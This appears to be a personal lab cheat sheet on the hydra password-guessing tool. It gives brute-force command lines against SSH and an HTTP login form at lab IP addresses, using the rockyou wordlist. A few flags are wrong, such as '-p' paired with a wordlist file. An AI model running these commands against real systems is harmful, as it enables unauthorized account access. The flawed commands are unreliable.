[Services] hydra

Tools for guess login to services like SSH, FTP and RDP

Avaiable wordlists

/usr/share/wordlists/metasploit
/usr/share/wordlists/rockyou.txt for username

Basic usage

hydra -l <username> -p <password> <server> <service>

Guess the username to linux machine

hydra -L users.txt -p butterfly 10.10.137.76 ssh

Guess the `username` to linux machine

hydra -L users.txt -p butterfly 10.10.137.76 ssh

Guess the `password` to linux machine

Using rockyou.txt as password

hydra -l root -p /usr/share/wordlists/rockyou.txt 10.10.137.76 ssh

Specific threads

Guess the password to linux machine, and specific the number of threads to 4

hydra -l root -p /usr/share/wordlists/rockyou.txt 10.10.137.76 -t 4 ssh

Specific HTTP post

With action = /login POST, and the input name is username and password.
Tell it’s wrong if Your username or password is incorrect. appares on the website.

hydra -l admin -P /usr/share/wordlists/rockyou.txt \
    10.10.156.82 http-post-form \
    "/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect." -V

Guess ssh

hydra -l root -P /usr/share/wordlists/rockyou.txt 10.10.156.82 -t 4 ssh

Pdfcrack Ffuf

[Services] hydra

Avaiable wordlists

Basic usage

Guess the username to linux machine

Guess the username to linux machine

Guess the password to linux machine

Specific threads

Specific HTTP post

Guess ssh

Guess the `username` to linux machine

Guess the `password` to linux machine